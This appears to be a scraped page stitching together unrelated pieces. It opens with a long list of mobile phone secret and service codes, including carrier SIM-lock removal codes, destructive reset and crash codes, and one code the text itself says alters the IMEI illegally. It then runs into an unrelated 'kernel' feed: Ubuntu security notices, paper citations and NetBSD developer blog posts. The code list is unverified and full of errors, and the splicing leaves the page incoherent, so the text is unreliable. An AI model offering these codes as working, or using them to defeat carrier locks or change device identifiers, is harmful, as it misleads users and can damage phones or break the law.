*#800# make Etel E10 model displaying message BT power on. But on display it dont resemble the blutooth power on icon.(actually t makes BT stuck, but after restarting t becomes normal <tested by me>)

More codes to reset chainese mobile phone
*#77218114#
*#881188#
*#94267357#
*#9426*357#
*#19912006#
*#118811#
*#3646633#

also found these

Service codes Konka:
C926 software version: *320# Send
C926 set default language: *#0000# Send
C926 set English language: *#0044# Send

Service codes GStar:
GM208 (Chinese Nokea 6230+) engineering menu: *#66*#
Set language to English: *#0044#
Set language to Russian: *#0007#

ZTE Mobile:>1- *938*737381#
2- PHONE WILL DIPLAYED DONE
3- POWER OFF YOUR PHONE AND POWER ON AGAIN
alcatel:>E205
unlocking phone code,only press***847# without simcard
E900 software version: *#5002*8376263#
E900 full reset: *2767*3855#

Service codes Spice:
S404 enable COM port: *#42253646633# -> Device -> Set UART -> PS -> UART1/115200
S410 engineer mode: *#3646633#
S900 software version: *#8375#
S900 serial no: *#33778#

Service codes Philips:
S200 enable COM port: *#3338913# -> Device -> Set UART -> PS -> UART1/115200

Service codes "Chinese" models:
default user code: 1122, 3344, 1234, 5678
Engineer mode: *#110*01#
Factory mode: *#987#
Enable COM port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
Restore factory settings: *#987*99#
LCD contrast: *#369#
software version: *#800#
software version: *#900#

Service codes BenQ:
software version: *#300#
test mode: *#302*20040615#

Service codes Pantech:
software version: *01763*79837#
service menu: *01763*476#
reset defaults (phone/user code reset to default): *01763*737381#

Service codes VK-Mobile **x, 5xx:
software version: *#79#
software version: *#837#
service menu: *#85*364# (hold #)

Service codes VK200, VK2000, VK2010, VK2020, VK4000:
software version: *#79#
service menu: *#9998*8336# (hold #)
reset defaults (phone/user code reset to default): *#9998*7328# (hold #)

Service codes LG:
software version: 2945#*#
KG300 NVRAM format: 2945#*# -> menu 15

Service codes Sony-Ericsson:
J100 software version: #82#

Service codes Fly:
M100 software version: ####0000#
2040(i) reset defaults: *#987*99# Send
MX200 reset defaults: *#987*99# Send
MX200 software version: *#900# Send
SL300m reset defaults: *#987*99# Send
SL300m software version: *#900# Send
SL500m reset defaults: *#987*99# Send
SL500m software version: *#900# Send
MP500 reset defaults: *#987*99# Send
MP500 software version: *#900# Send
Set language to English: *#0044#
Set language to Russian: *#0007#

Service codes Konka:
C926 software version: *320# Send
C926 set default language: *#0000# Send
C926 set English language: *#0044# Send

Service codes GStar:
GM208 (Chinese Nokea 6230+) engineering menu: *#66*#
Set language to English: *#0044#
Set language to Russian: *#0007#

Service codes Motofone-F3:
Motofone F3 software version: **9999* Send
***300* Set SIM Pin
***310* / ***311* SIM Pin ON | OFF
***000* Reset Factory settings
***644* Set Voicemail number
***260* / ***261* Auto keypad lock ON | OFF
***510* / ***511* Voice Prompts ON | OFF
***160* / ***161* Restricted Calling (Phonebook only) ON | OFF
***200608* Send: software version
***200606* Send: software version
***200806* Send: flex version
***250* / ***251* Keypad tones ON | OFF
***470* Select time format
***500* /***501* Prepaid Balance Display ON | OFF
***520* Change language

Service codes Motorola:
C113, C114, C115, C115i, C116, C117, C118 software version: #02#*
C138, C139, C140 software version: #02#*
C155, C156, C157 software version: #02#*
C257, C261 software version: #02#*
V171, V172, V173 software version: #02#*
V175, V176, V176 software version: #02#*
C168, W220 software version: *#**837#
W208, W375 software version: #02#*
and "yes"''

I-mobile Inno30, 55, 89, 90, 99, 100, A10, A20, P10, Vk200
- Set full factory *741*737381#
- Set full factory *741*7373868#
- Set full factory *741*2878#
- Set Engineer Mode *888*888#
- Check software version *888*837#

I-mobile 100 ,200 , 313
- Check software version #*888#

I-mobile 309, 310
- Check software version *0*4636#
- Test Mode *0*6268#

I-mobile 311
- Check software version #*878#

I-mobile 511
- Check software version *1222*1#

I-mobile 301, 302,308, 508, 601, 602, 603, 604, 606, 611, 901, 902
- Check software version *#159#
- Set Factory Mode *#32787#
- Set Engineer Mode *#3646633#

I-mobile 503, 506, 605, 600, 607, 608
- Set Engineer Mode ***503#
- Set Factory Mode ***504#
- Set Auto Test ***505#

I-mobile 509, 612
- Set Factory Mode *#66*#

I-mobile 504, 505, 803
- Check software version *68*48#
- Set full factory *789#
- Test Mode *#789#

I-mobile 305, 306, 315, 510, 609, 609i,516
- Check software version *#8375#
- Set Factory Mode 878
I-mobile 610
- Check software version *#22#

I-mobile J101, J102
- Test Mode *23638777*783781#

I-mobile 502, 502i, 505, k9, 802
- Check software version *201206*4636#

Samsung
Samsung Programmers code!(Secret code)


  All Samsung Hard Reset Codes
 1.)*2767*3855#
2.)*7465625*638*00000000*00000000#
3.)#7465625*638*00000000#
Following is the list of code for SIM issue:

*7465625*746*code# Enables SIM lock
#7465625*746*code# disables SIM lock
*7465625*28746# Auto SIM lock On
#7465625*28746# Auto SIM lock Off
*#0778# Sim Serv, Table.
*#0638# SIM Network ID.
*#0746# SIM info.
*#2576# SIM error.
*#0778# To see what your SIM supports.
*#0746# Your sim type.
*#9998* NET# SIM NEtwork ID
*#9998*778# SIM Serv. Table.
*#9998*2576# Forces SIM Error.

To remove sim locks:
#0111*0000000#
*2767*66335#
*2767*3700#
*2767*7100#
*2767*8200#
*2767*7300#
*2767*2877368#
*2767*33927#
*2767*85927#
*2767*48927#
*2767*37927#
*2767*28927#
*2767*65927#
*2767*29927#
*2767*78927#
*2767*79928#
*2767*79928#
*2767*82927#
*2767*787927#
*2767*73738927#
*2767*33667#
*2767*85667#
 PROGRAMMER CODES!

*#06#=Displays IMEI NO.
*#9999#=SW Version.
*#8888#=HW Version.
*#0842#=Vibrator.
*#0289#=Buzzer.
*#0228#=Battery Stat.
*#0782#=RTC Display
*#0523#= LCD Contrast.
*#0377#=NVM error log
*#5646#=GSM Logo Set.
*#0076#=Production No.
*#3323#=Forced Crash
*#9324#=Netmon <> press the hung
up key to exit.
*#32439483 =Digital Audio Interference
off.
*#32436837#=Digital Audio Interference
on.
*#9998*JAVA# =Edit GPRS/CSD settings
*#9998*Help# =Screen / List of codes.
*#9998*=RTC# =RTC Display.
*#9998*bat#=Battery Status.
*#9998*buz#=Turns Buzzer On.
*#9998*vub# =Turns Vibator On.
*#9998*LCD#=LCD Contrast.
*#9998*9999#=Sotfware Version.
*#9998*8888#=Hardware Version.
*#9998*377#=Non Volatile Merory Error Log
*#9998*968#=Remider Tune.
*#9998*NVM#=Displays Non-Volitile
Mermory Status.
*#9999*C#=Netmon.
*#9998* DEAD# =Forces Phone Crash.
*#9998*533# =(LED).
*#999* =Show date and alarm clock.
*#8999*638# =show network information.
*#9998*5646# =change operator logoat
startup.
*#9998*968# =View melody alarm.
*2767*MEDIA# =Resets the media on phone
*2767*FULL# =Resets the EEPRON*
*2767*CUST# =Resets the sustom EEPRON.
*2767*JAVA#= Resets JAV downloads
*2767*STACKREST# =RESETS STACK.
*2767*225RESET# * =VERY Dangerous.
*2767*688# = Unlocking code
*#8999*8378# = All in one code
*#4777*8665# = GPSR Tool
*#8999*3825583# = External Display
*#8999*377# = Errors
*#2255# = call list
#*5737425# = JAVA Something choose 2and
it crashed.
#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code
#*1200# = AFC DAC Val
#*1300# =IMEI
#*2562# = white for 15 sec than restarts.
#*2565# =Check Blocking
#*3353# =check code
#*3837# = White for 15 secs than restarts.
#*3849# = white for 15 secs than restarts.
#*7222# = Operation Type
#*7224# = I got ERROR !
#*7252# = Operation Type
#*7271# =Multi Slot
#*7271# =Multi Slot
#*7337# = EPROM Reset ( unlock and resets Wap settings)
#*2787# =CRTP ON/OFF
#*3737#= L1 Dbg Data
#*5133# =L1 Dbg Data
#*7288# =GPRS Attached
#*7287# =GPRS Detached
#*7666# =SrCell Data
#*7693# =Sleep Act/Deact
#*7284# =Class B/C
#*2256# =Calibration Info
#*2286# =Battery Data
#*2679# =Copycat Feature
#*3940# =External loop 9600 bps
#*8462# =sleep time
#*5176# =L1 Sleep
#*5187#= L1C2G Trace
#*3877#= Dump Of spy trace
*#8999*8376263# =HW Ver SW Ver and build date
*#746565# =Checks the locks
*7465625*638*Code# =Enables Network lock
#7465625*638*Code#= Disables Network lock
#7465625*782*code# =Disables Subset lock
*7465625*782*code# =Enables subset lock



*Known Unlock CODES*
S500/ P400/ E500/ E700/ X100/ X600/
E100/
Enter *2767*3855# with and accepted SIM
card If this codes fails,

For accepted sim card insert below code:
Enter *2767*688# or #*7337#
A300/ A400 / A800
*2767*637#
S100 / S300 / V200 / V205 / E710 / E715
/ D410 / X426/
*2767*7822573738#

Try this if above code fails:

1.) Insert sim card
2.) type #9998*3323# if it display wrong card
3.)Press exit and select 7.
4) Phone will reboot.
5.) SIM should work.
6.) Type *0141# and press call.
7.) Power off the phone and insert another sim card
8.) If a code is requested,Enter 00000000.
NOTE : PAKIDEA.COM ARE NOT RESPONSIBLE FOR ANY PROBLEM OCCURS WHILE USING THESE CODE. ITS ALL DOWN TO THE USER WHO IS USING THESE CODE.

*#9998*289# : Change Alarm Buzzer Frequency
*#9998*364# : Watchdog
*#9998*523# : Change LCD contrast - Only with version G60RL01W
*#9998*746# : SIM File Size
*#9998*862# : Vocoder Reg - Normal, Earphone or carkit can be selected
*#9998*786# : Run, Last UP, Last DOWN
If the up Codes doesn't work, you should change *#9998* to *#0. i.e. *#9998*523# change to
*#0523#. An other thing that will help is to remove your SIM card. *0001*s*f*t# : Changes serial
parameters (s=?, f=0,1, t=0,1) (incomplete)
*0003*?# : unknown
*0003*?# : unknown

*#9998*377# : EEPROM Error Stack - Use side keys to select values. Cancel and ok
*#9998*427# : Trace Watchdog
*#9998*785# : RTK (Run Time Kernel) errors - if ok then phn is reset, info is put in memory error.
*#9998*778# : SIM Service Table

*#9998*947# : Reset On Fatal Error
*#9998*872# : Diag
*#9998*999# : Last/Chk
*#9998*324# : Debug screens
*#9998*636# : Memory status
*#9998*544# : Jig detect
*#9998*842# : Test Vibrator - Flash the screenligth during 10 seconds and vibration activated
*#9998*837# : Software Version

*#9998*228# : Battery status (capacity, voltage, temperature)
*#9998*246# : Program status

*#9998*9266# : Yann debug screen (=Debug Screens?)
*#9998*9999# : Software version

SP-unlock SGH-600 (and also SGH-Sgh-600
*2767*3855# : Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!! )
But also changes IMEI to 447967-89-400044-0. (Doing this is illegal)

*2767*2878# : Custom EEEPROM Reset
*These codes have been tested with version FLD_2C6 G60SB03X of Samsung SGH-600

Samsung SGH-600 Unlock Codes
*#9999# : Show Software Version
*#9125# : Activates the smiley when charging.
*#0001# : Show Serial Parameters

To download nero software free 

To know more about Mobile flash
          [Bug 11742] 64 bit builds show a kernel warning for CONFIG_X86_BIGSMP   

          uisp-20050207-alt2   
uisp-20050207-alt2  build (NMU) Aleksei Nikiforov, 29 june 2017, 12:32

Maintainer:Evgeny Sinelnikov
Group: System/Kernel and hardware
Summary: Universal In-System Programmer for Atmel AVR and 8051
Changes:
- Updated spec to allow any compression of man page
          Ubuntu Security Notice USN-3345-1   
Ubuntu Security Notice 3345-1 - USN 3324-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. Roee Hay dis ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3344-2   
Ubuntu Security Notice 3344-2 - USN-3344-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement kernel from ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3344-1   
Ubuntu Security Notice 3344-1 - USN 3328-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. Roee Hay dis ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3342-1   
Ubuntu Security Notice 3342-1 - USN 3326-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. It was disco ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3343-1   
Ubuntu Security Notice 3343-1 - USN 3335-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. It was disco ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3343-2   
Ubuntu Security Notice 3343-2 - USN 3343-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement kernel from ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3338-2   
Ubuntu Security Notice 3338-2 - USN-3338-1 fixed vulnerabilities in the Linux kernel. However, the fix for CVE-2017-1000364 introduced regressions for some Java applications. This update addresses the ... - Source: packetstormsecurity.com
           Application of string kernels in protein sequence classification    
Zaki, Nazar M. and Deris, Safaai and Illias, Rosli Md (2005) Application of string kernels in protein sequence classification. Applied Bioinformatics, 4 . pp. 45-52. ISSN 11755636
           The Riemann-Hilbert problem and the generalized Neumann kernel    
Wegmann, Ruw and Murid, A. H. M. and Nasser, M. M. S. (2005) The Riemann-Hilbert problem and the generalized Neumann kernel. Journal of Computational and Applied Mathematics, 182 . 388 -415. ISSN 03770427
          A Deep Learning Performance Lens for Low Precision Inference   

Few companies have provided better insight into how they think about new hardware for large-scale deep learning than Chinese search giant, Baidu.

As we have detailed in the past, the company’s Silicon Valley Research Lab (SVAIL) in particular has been at the cutting edge of model development and hardware experimentation, some of which is evidenced in their publicly available (and open source) DeepBench deep learning benchmarking effort, which allowed users to test different kernels across various hardware devices for training.

Today, Baidu SVAIL extended DeepBench to include support for inference as well as expanded training kernels. Also of

A Deep Learning Performance Lens for Low Precision Inference was written by Nicole Hemsoth at The Next Platform.


           Palm kernel oil leaching    
Morad, Noor Azian and Abdul Aziz, Mustafa Kamal and Sabri, Abu Safian and Ismail, Buliam (1989) Palm kernel oil leaching. Proceedings of The Fifth Symposium Of Malaysian Chemical Engineers . pp. 432-442.
          Autotuning GPU Kernels via Static and Predictive Analysis. (arXiv:1701.08547v3 [cs.DC] UPDATED)   

Authors: Robert V. Lim, Boyana Norris, Allen D. Malony

Optimizing the performance of GPU kernels is challenging for both human programmers and code generators. For example, CUDA programmers must set thread and block parameters for a kernel, but might not have the intuition to make a good choice. Similarly, compilers can generate working code, but may miss tuning opportunities by not targeting GPU models or performing code transformations. Although empirical autotuning addresses some of these challenges, it requires extensive experimentation and search for optimal code variants. This research presents an approach for tuning CUDA kernels based on static analysis that considers fine-grained code structure and the specific GPU architecture features. Notably, our approach does not require any program runs in order to discover near-optimal parameter settings. We demonstrate the applicability of our approach in enabling code autotuners such as Orio to produce competitive code variants comparable with empirical-based methods, without the high cost of experiments.


          Time Series Cluster Kernel for Learning Similarities between Multivariate Time Series with Missing Data. (arXiv:1704.00794v2 [stat.ML] UPDATED)   

Authors: Karl Øyvind Mikalsen, Filippo Maria Bianchi, Cristina Soguero-Ruiz, Robert Jenssen

Similarity-based approaches represent a promising direction for time series analysis. However, many such methods rely on parameter tuning, and some have shortcomings if the time series are multivariate (MTS), due to dependencies between attributes, or the time series contain missing data. In this paper, we address these challenges within the powerful context of kernel methods by proposing the robust \emph{time series cluster kernel} (TCK). The approach taken leverages the missing data handling properties of Gaussian mixture models (GMM) augmented with informative prior distributions. An ensemble learning approach is exploited to ensure robustness to parameters by combining the clustering results of many GMM to form the final kernel.

We evaluate the TCK on synthetic and real data and compare to other state-of-the-art techniques. The experimental results demonstrate that the TCK is robust to parameter choices, provides competitive results for MTS without missing data and outstanding results for missing data.


          Unbloating the VAX install CD   
A recent discussion on the port-vax mailing list brought a problem with the default installation method (when booting from CD, which typically is the easiest way) to my attention: it would not work on machines with 16 MB RAM or less.

So, can we do better? Looking at the size of a GENERIC kernel:

   text    data     bss     dec     hex filename
2997389   67748  173044 3238181  316925 netbsd
it seems we can not easily go below 4 MB (and for other reasons we would need to compile the bootloader differently for that anyway). But 16MB is still quite a difference, so it should work.

Now at the time I started this quest, I only had one VAX machine in real hardware - a VaxStation 4000 M96a, one of the fastest machines, and with 128 MB RAM well equipped. This is nice if you try to natively compile modern gcc, but I did not feel like fiddling with my hardware to create a better test environment for small RAM installations.

Like a year (or so) ago, when I fixed the VAX primary boot blocks (with lots of help from various vaxperts on the port-vax mailing list), SIMH, found in pkgsrc as emulators/simh, proved helpful. Testing various configurations I found an emulated VAX 11/780 with 8 MB to be the smallest I could get working.

The first step of the tuning was obvious: the CD image used a ramdisk based kernel, with the ramdisk containing all of the install system. At the same time, most of the CD was unused. We already use different schemes on i386, amd64 and sparc64 - so I cloned the sparc64 one and adjusted it to VAX. Now we use the GENERIC kernel on CD and mount the ISO9660 filesystem on the CD itself as root file system. The VAX boot loader already could deal with this, only a minor fix was needed for the kernel to recognize some variants of CD drives as boot device.

The resulting CD did boot, but did not go far in userland. The CD did only contain a (mostly) empty /dev directory (without /dev/console), which causes init(8) to mount a tmpfs on /dev and run the MAKEDEV script there. But to my surprise, on the 11/780 mfs was used instead of tmpfs - and we will see why soon. Next step in preparation of the userland for the installer is creating additional tmpfs instances to deal with the read-only nature of the CD used as root. This did not work at all, the mount attempts simply failed - and the installer was very unhappy, as it could not create files in /tmp for example.

I checked, but tmpfs was part of the VAX GENERIC kernel. I tried the install CD on a simulated MicroVAX 3900 with 64 MB of RAM - and to my surprise all of /dev and the three additional tmpfs instances created later worked (as well as the installation procedure). I checked the source (stupid me) and then found the documentation: tmpfs reserved a hard coded 4 MB of RAM for the system. With the GENERIC kernel booted on a 8 MB machine, we had slightly less than 4 MB RAM free, so tmpfs never worked.

One step back - this explained why /dev ended up as a mfs instead of tmpfs. The MAKEDEV code is written to deal with kernels that do include tmpfs, but also with those that do not: it tried tmpfs, and falls back to mfs if that does not work. This made me think, I could do the same (but without even trying tmpfs): I changed the install CD scripts to use mfs instead of tmpfs. The main difference is: mfs uses a userland process to manage the swappable memory. However, we do not have any swap space yet. Checking when sysinst enables swapping for the first time, I found: it never did on VAX. Duh! I added the missing calls to machine dependent code in sysinst, but of course the installer can only enable swap after partitioning is done (and a swap partition got created).

Testing showed: we did not get far enough with four mfs instances. So let us try with fewer. One we do not need is the /dev one: I changed the CD content creation code to pre-populate /dev on the CD. This is not possible with all filesystems, including the original ISO9660 one, but with the so-called Rockridge Extensions it works. We know that it is a modern NetBSD kernel mounting the CD - so support for those extensions is always present. I made some errors and hit some bugs (that got fixed) on the way there, but soon the CD booted without creating a mfs (nor tmpfs) for /dev.

Still, three mfs instances did not survive until sysinst enabled swapping. The userland part was killed once the kernel ran out of memory. I needed tmpfs working with less than 4 MB memory free. After a slight detour and some discussion on the tech-kern mailing list, I changed tmpfs to deal (and only reserve a dynamically scaled amount of memory calculated bv the UVM memory management). With this change, a current install CD just works, and installation completes successful.

The following is just the start of the installation process, the sysinst part afterwards is standard stuff and left out for brevity.

Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
    2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014                 
    The NetBSD Foundation, Inc.  All rights reserved.   
Copyright (c) 1982, 1986, 1989, 1991, 1993           
    The Regents of the University of California.  All rights reserved.
                                                                      
NetBSD 6.99.43 (GENERIC) #1: Thu Jun  5 22:01:14 CEST 2014
        martin@night-owl.duskware.de:/usr/obj/vax/usr/src/sys/arch/vax/compile/GENERIC
VAX 11/780
total memory = 8188 KB
avail memory = 3884 KB
mainbus0 (root)       
cpu0 at mainbus0: KA80, S/N 1234(0), hardware ECO level 7(112)
cpu0: 4KB L1 cachen, no FPA                                   
sbi0 at mainbus0           
mem0 at sbi0 tr1: standard
mem1 at sbi0 tr2: standard
uba1 at sbi0 tr3: DW780   
dz1 at uba1 csr 160100 vec 304 ipl 15
mtc0 at uba1 csr 174500 vec 774 ipl 15
mscpbus0 at mtc0: version 5 model 5   
mscpbus0: DMA burst size set to 4  
uda0 at uba1 csr 172150 vec 770 ipl 15
mscpbus1 at uda0: version 3 model 6   
mscpbus1: DMA burst size set to 4  
de0 at uba1 csr 174510 vec 120 ipl 15: delua, hardware address 08:00:2b:cc:dd:ee
mt0 at mscpbus0 drive 0: TU81                                                  
mt1 at mscpbus0 drive 1: TU81
mt2 at mscpbus0 drive 2: TU81
mt3 at mscpbus0 drive 3: TU81
ra0 at mscpbus1 drive 0: RA92
ra1 at mscpbus1 drive 1: RA92
racd0 at mscpbus1 drive 3: RRD40
ra0: size 2940951 sectors       
ra1: no disk label: size 2940951 sectors
racd0: size 1331200 sectors             
boot device: racd0         
root on racd0a dumps on racd0b
root file system type: cd9660 
init: kernel secur           

You are using a serial console, we do not know your terminal emulation.
Please select one, typical values are:

        vt100
        ansi
        xterm

Terminal type (just hit ENTER for 'vt220'): xterm
                                                                                
 NetBSD/vax 6.99.43                                                             
                                                                                
 This menu-driven tool is designed to help you install NetBSD to a hard disk,   
 or upgrade an existing NetBSD system, with a minimum of work.                  
 In the following menus type the reference letter (a, b, c, ...) to select an   
 item, or type CTRL+N/CTRL+P to select the next/previous item.                  
 The arrow keys and Page-up/Page-down may also work.                            
 Activate the current selection from the menu by typing the enter key.          


                +---------------------------------------------+
                |>a: Installation messages in English         |
                | b: Installation auf Deutsch                 |
                | c: Mensajes de instalacion en castellano    |
                | d: Messages d'installation en français      |
                | e: Komunikaty instalacyjne w jezyku polskim |
                +---------------------------------------------+

Overall this improved NetBSD to better deal with small memory systems. The VAX specific install changes can be brought over to other ports as well, but sometimes changes to the bootloader will be needed.
          First ports switched to gcc 4.8   
After several months of preparation, the first ports (hppa, sparc and sparc64) have switched their compiler to gcc version 4.8 today. Amd64 and i386 should follow soon.

Work is ongoing to bring this modern toolchain to all other ports too (most of them already work, but some more testing will be done). If you want to try it, just add -V HAVE_GCC=48 to the build.sh invocation.

Note that in parallel clang is available as an alternative option for a few architectures already (i386, amd64, arm, and sparc64), but needs more testing and debugging at least on some of them (e.g. the sparc64 kernel does not boot).

For a project with diverse hardware support like NetBSD, all toolchain updates are a big pain - so a big THANK YOU! to everyone involved; in no particular order Christos Zoulas, matthew green, Nick Hudson, Tohru Nishimura, Frank Wille (and myself).


          Google Summer of Code 2013 report: Defragmentation for FFS   

The following report is by Manuel Wiesinger:

First of all, I like to thank the NetBSD Foundation for enabling me to successfully complete this Google Summer of Code. It has been a very valuable experience for me.

My project is a defragmentation tool for FFS. I want to point out at the beginning that it is not ready for use yet.

What has been done:

Fragment analysis + reordering. When a file is smaller or equal than the file system's fragment size, it is stored as a fragment. One can think of a fragment as a block. It can happen that there are many small files that occupy a fragment. When the file systems changes over time it can happen that there are many blocks containing fewer fragments than they can hold. The optimization my tool does is to pack all these fragments into fewer blocks. This way the system may get a little more free space.

Directory optimization. When a directory gets deleted, the space for that directory and its name are appended to the previous directory. This can be imagined like a linked list. My tool reads that list and writes all entries sequentially.

Non-contiguous files analysis + reordering strategy. This is what most other operating systems call defragmentation - a reordering of blocks, so that blocks belonging to the same file or directory can be read sequentially.

What did not work as expected

Testing: I thought that it is the most productive and stable to work with unit tests. Strictly test driven development. It was not really effective to play around with rump/atf. Although I always started a new implementation step by generating a file system in a state where it can be optimized. So I wrote the scripts, took a look if they did what I intended (of course, they did not always).

I'm a bit disappointed about the amount of code. But as I said before, the hardest part is to figure out how things work. The amount it does is relatively much, I expected more lines of code to be needed to get where I am now.

Before applying for this project, I took a close look at UFS. But it was not close enough. There were many surprises. E.g. I had no idea that there are gaps in files on purpose, to exploit the rotation of hard disks.

Time management, everything took longer than I expected. Mostly because it was really hard to figure out how things work. Lacking documentation is a huge problem too.

Things I learned

A huge lesson learned in software engineering. It is always different than expected, if you do not have a lot of experience.

I feel more confident to read and patch kernel code. All my previous experiences were not so in-depth. (e.g., I worked with pintos). The (mental) barrier of kernel/system programming is gone. For example I see a chance now to take a look on ACPI, and see if I can write a patch to get suspend working on my notebook.

I got more contact with the NetBSD community, and got a nice overview how things work. The BSD community here is very mixed. There are not many NetBSD people.

CVS is better than most of my friends say.

I learned about pkgsrc, UVM, and other smaller things about NetBSD too, but that's not worth mentioning in detail.

How I intend to continue:

After a sanity break, of the whole project, there are several possibilities.

In the next days I will speak to a supervisor at my university, if I can continue the project as a project thesis (I still need to do one). It may even include online defragmentation, based on snapshots. That's my preferred option.

I definitely want to finish this project, since I spent so much time and effort. It would be a shame otherwise.

What there is to do technically

Once the defragmentation works, given enough space to move a file. I want to find a way where you can defragment it even when there is too little space. This can be achieved by simply moving blocks piece by piece, and use the files' space as 'free space'.

Online defragmentation. I already skimmed hot snapshots work. It should be possible.

Improve the tests.

It should be easy to get this compiling on older releases. Currently it compiles only on -current.

Eventually it's worth it to port the tests to atf/rump on the long run.

Conclusion

I will continue to work, and definitely continue to use and play with NetBSD! :)

It's a stupid thing that a defrag tool is worth little (nothing?) on SSDs. But since NetBSD is designed to run on (almost) any hardware, this does not bug me a lot.

Thank you NetBSD! Although it was a lot of hard work. It was a lot of fun!

Manuel Wiesinger


          posix_spawn syscall added   

Charles Zhang implemented the posix_spawn syscall during Google Summer of Code 2011. After a lot of polishing and rework based on feedback during public discussion of the code, this has now been committed to NetBSD-current.

This caused some fallout and ended in a tight race with the imminent branch date for NetBSD 6. Now that the dust has settled, it is time for a look back at the mistakes made and lessons learned.

What is posix_spawn?

Traditionally BSD systems used the vfork(2) hack to improve speed of process creation. However, this does (in general) not play well with multi-threaded applications. The posix_spawn call is a thread-safe way to create new processes and manipulate a tiny bit of state (like dup/close/open file descriptors) upfront.

Work continued after GSoC

The results Charles had at the end of his GSoC term were a working in-kernel implementation of posix_spawn and a few free-form test cases, one of which failed. The kernel code duplicated a lot of other code, which clearly was not acceptable for commit to the NetBSD source tree. The reason Charles solved it this way was the short time frame available - and that the best solution we could think of during the summer was very intrusive.

In preparation for a potential merge into the NetBSD code base, I reworked the code to avoid copying helper functions (like file descriptor manipulations for other processes), cleaned up and debugged a bit using a LOCKDEBUG kernel, which pointed out a few more issues. After solving those as well as intensively testing all error paths, I posted a patch for review.

At this point the integration was already prepared completely - a new syscall, new libc functions, new manual pages need a lot of set lists updates and test building a "release" at least once (preferably on an architecture providing 32bit compat libraries), furthermore the posix_spawn code needed (simple) machine-dependent code to be added to all architectures, which at least requires test-building a representative set of kernels.

Another complete rework

In response to the posted, very intrusive, patch, YAMAMOTO Takashi suggested a pretty elegant way to solve the problem without a lot of the intrusive changes. The idea was simple, and it actually worked after a few adjustments. This led to another public patch for review.

This version already included an atf version of the test programs, which all passed (both on amd64 and sparc64). I felt pretty confident with this state and expected a smooth integration.

Unexpected fallout

More for completeness I did a full test run (not only the posix_spawn related tests) - and found some unexpected test failures, all in rump based tests. I retried and got different failures. Suspicious - I did not touch rump, besides regenerating the syscall definitions. I rebooted a standard kernel (without posix_spawn), did a full test run and only got failures in the posix_spawn tests (of course). So something in the change must have broken something else.

Analysis was a painful process, so only a short summary of the results: the modified kernel exec path used a pointer to a kernel stack variable, which was later copied to a saved data structure - but the pointer was not adjusted accordingly. Later the pointer was referenced, and only a single bit checked. Depending on what was in memory at the stale old stack location at that time, a branch was taken or not. This caused the ELF auxiliary data vector to sometimes contain a different effective UID, and ld.elf_so switching into secure mode - in which case it ignores environment variables like LD_PRELOAD. This causes big failure in many test programs using rump (at least).

While I was debugging this, discussions continued. We were not sure if we should add complex code like this to the kernel, where a pure userland implementation clearly is possible (FreeBSD uses this, for example). I did a few benchmark runs, but was unable to show any clear performance benefit for either implementation - the differences were in the sub-promille ranges, with noise in the 2-3 percent range, clearly no usable result from a statistical point of view. Another topic under discussion was the near planned branch for NetBSD 6. According to our rules, we do not want to add a syscall post-branch to a release branch.

Go ahead, finally!

The discussions ended with the core team voting for a kernel version, and the release engineering team voting for a pre-netbsd-6-branch integration. So I updated my posix_spawn source tree, did another test build, ran tests (again on amd64 and sparc64), updated again - and committed in a few steps.

Big fallout

Checking mails early next morning (a Sunday, before walking the dog) I found a PR already: running the m4 configure script crashed i386 and amd64 kernels. Tsutsui kindly had provided a backtrace in the report, and it looked suspiciously familiar to me. While walking the dog I thought about it and when I got home I checked: indeed I had seen and fixed this before, when testing error paths in the first instance of the change. However, when dropping all the intrusive modifications I had in my tree and redoing the version without them, I must have accidentally dropped the fix for this (it was in sys/uvm instead of sys/kern). No big deal, I had fixed it once already, so I could fix it again. Committed, asked for verification - and did get a NAK. However, with a different back trace this time. Tried on my amd64 notebook - worked for me. Duh?

Looking at the code and fixing the second fallout now was straight forward, and also provided the hint why I did not see it before: I was not running a GENERIC kernel on my notebook, and had (some time way back in the past) removed options DIAGNOSTIC from this configuration. Stupid me!

I received more feedback (YAMAMOTO-san pointed out some race conditions) and had a discussion about the place where the test programs should live in the source. To not risk delaying the netbsd-6 branch, I applied a minimal fix for the races, moved the test programs - and added a few more test cases covering the initial m4 configure problems (the rework earlier had made it pretty simple now to test all error paths from atf test cases).

This caused the automatic test setup to crash on every run ("Tests did not complete"). At this point I am still not sure why I did not catch this before commit - but there is no point in arguing, human failure - my fault (most likely explanation: after the last changes to the test cases, I did not test again on amd64 but only sparc64 - the test cases triggered a KASSERT in the x86 pmap, but not in the sparc64 one).

I fixed this, and also another PR, interestingly about m4 configure again. Simple argument validation bug, not covered by the test cases yet - so I added another test.

Are we there yet?

Luckily fallout seems to have stopped now, but we are not completely there yet. The new process created by posix_spawn keeps the parent lwp blocked until it is done with all file descriptor modifications and setup, and the new process is ready to go to userland first time. This provides a proper error return value from the parent (the posix_spawn syscall itself), but it stops the new child from (for example) already running on another CPU early. This will be simple to change, but after all the fallout we have seen, I will only touch it after very extensive testing again.

Lessons learned

When bringing in a new syscall with several supporting libc functions, fallout is always to be expected. It can be minimized by including test programs early - but in the end, real life will teach you what tests you have missed when writing the test programs. It is also important do full test suite runs early, and test on different architectures. Even better if you test on kernels with (at least) DIAGNOSTIC enabled. But in the end, mistakes will happen nevertheless.


          Portable C Compiler   

